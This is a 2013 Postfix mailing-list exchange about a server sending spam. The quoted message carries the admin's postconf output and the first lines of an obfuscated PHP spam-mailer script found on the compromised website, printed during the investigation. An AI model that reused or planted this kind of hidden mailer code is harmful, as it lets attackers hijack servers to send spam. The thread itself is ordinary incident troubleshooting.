On 10/7/2013 9:10 PM, li...@sbt.net.au wrote: > On Tue, October 8, 2013 11:31 am, Simon B wrote: >> On 8 Oct 2013 01:54, "Voytek" <li...@sbt.net.au> wrote: > >> spam from many.na...@adomain.tld, how best to prevent any outbound mails >> from adomain.tld till I can look at this? > >> Postfix stop >> >> >> Then post your postconf -n and a log snippet of an outgoing span press. > > Simon, thanks
Without the log entries Simon asked for we can't do anything more to help you, as we don't know how the spam is being injected. Please provide logging that demonstrates the problem. > -------------------- > # postconf -n > address_verify_sender = $double_bounce_sender > alias_database = hash:/etc/aliases > alias_maps = hash:/etc/aliases > anvil_rate_time_unit = 1800s > body_checks = pcre:/etc/postfix/body_checks > body_checks_size_limit = 150000 > broken_sasl_auth_clients = yes > command_directory = /usr/sbin > config_directory = /etc/postfix > content_filter = smtp-amavis:[127.0.0.1]:10024 > daemon_directory = /usr/libexec/postfix > debug_peer_level = 2 > disable_vrfy_command = yes > header_checks = pcre:/etc/postfix/header_checks > home_mailbox = Maildir/ > html_directory = /usr/share/doc/postfix-2.4.5-documentation/html > local_recipient_maps = unix:passwd.byname $alias_maps > local_transport = local > mail_owner = postfix > mailq_path = /usr/bin/mailq.postfix > manpage_directory = /usr/share/man > message_size_limit = 15360000 > mime_header_checks = pcre:$config_directory/mime_headers.pcre > mydestination = $myhostname, localhost.$mydomain > myhostname = server.tld > mynetworks = 111.222.333.444 222.333.444.555 127.0.0.1 > myorigin = $mydomain > newaliases_path = /usr/bin/newaliases.postfix > queue_directory = /var/spool/postfix > readme_directory = /usr/share/doc/postfix-2.4.5-documentation/readme > recipient_bcc_maps = hash:/etc/postfix/bcc_r_maps > recipient_delimiter = + > sample_directory = /etc/postfix/samples > sender_bcc_maps = hash:/etc/postfix/bcc_s_maps > sendmail_path = /usr/sbin/sendmail.postfix > setgid_group = postdrop > smtp_tls_cert_file = $smtpd_tls_cert_file > smtp_tls_key_file = $smtpd_tls_key_file > smtp_tls_loglevel = 1 > smtp_tls_note_starttls_offer = yes > smtp_tls_security_level = may > smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache > smtp_tls_session_cache_timeout = 3600s > smtpd_client_connection_rate_limit = 50 > smtpd_data_restrictions = reject_unauth_pipelining, permit > smtpd_helo_required = yes > smtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated, > check_helo_access ${RE}helo.re > smtpd_recipient_restrictions = permit_sasl_authenticated, > permit_mynetworks, reject_unauth_destination, check_recipient_access > hash:/etc/postfix/recipient_no_checks, reject_non_fqdn_sender, > reject_non_fqdn_recipient, reject_invalid_helo_hostname, > reject_non_fqdn_helo_hostname, reject_unknown_sender_domain, > reject_unknown_reverse_client_hostname, reject_unlisted_recipient, > check_sender_access hash:/etc/postfix/freemail_access, > check_recipient_access pcre:/etc/postfix/recipient_checks.pcre, > check_helo_access hash:/etc/postfix/helo_checks, check_sender_access > hash:/etc/postfix/sender_checks, check_client_access > hash:/etc/postfix/client_checks, check_client_access > pcre:/etc/postfix/client_checks.pcre, reject_rbl_client zen.spamhaus.org, > reject_rhsbl_client dbl.spamhaus.org, reject_rhsbl_sender > dbl.spamhaus.org, reject_rbl_client psbl.surriel.com, reject_rbl_client > bl.spamcop.net, reject_rhsbl_sender dsn.rfc-ignorant.org, > check_policy_service inet:127.0.0.1:10031, permit > smtpd_restriction_classes = from_freemail_host > smtpd_sasl_auth_enable = yes > smtpd_sasl_authenticated_header = yes > smtpd_sasl_local_domain = > smtpd_sasl_path = private/auth > smtpd_sasl_security_options = noanonymous > smtpd_sasl_type = dovecot > smtpd_tls_auth_only = yes > smtpd_tls_cert_file = /etc/pki/tls/certs/server.crt > smtpd_tls_key_file = /etc/pki/tls/certs/server.key > smtpd_tls_loglevel = 1 > smtpd_tls_received_header = yes > smtpd_tls_security_level = may > smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache > smtpd_tls_session_cache_timeout = 36000s > strict_rfc821_envelopes = yes > tls_random_source = dev:/dev/urandom > transport_maps = hash:/etc/postfix/transport > unknown_local_recipient_reject_code = 550 > virtual_alias_maps = proxy:mysql:/etc/postfix/mysql_virtual_alias_maps.cf > virtual_gid_maps = static:5000 > virtual_mailbox_base = /var/mail/vhosts > virtual_mailbox_domains = > proxy:mysql:/etc/postfix/mysql_virtual_domains_maps.cf > virtual_mailbox_limit = $message_size_limit > virtual_mailbox_maps = proxy:mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf > virtual_minimum_uid = 5000 > virtual_transport = lmtp:unix:private/dovecot-lmtp > virtual_uid_maps = static:5000 > > -------------------- > > there is a php script on their web as so, I'm trying to see how it was > uploaded at this point: > > --------------------- > head xmlrpcVZY.php > <?php > @error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL); > @ini_set('log_errors',0); if (count($_POST) < 2) { > die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; > foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case > chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = > $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case > chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || > $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); > $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); > $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; > $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = > n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = > n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); > $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = > urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) != > false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 = > count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; } > for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 = > $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1)) > continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, > $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); > $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); > $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || > $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; > } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { > $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); > $v3a5939e4 = next(explode('@', $v01b6e203)); } > preg_match('|<USER>(.*)</USER>| > snip > --------------------- > > (i wasn't able to include above as I was on 4" mobile screen, sorry) > > >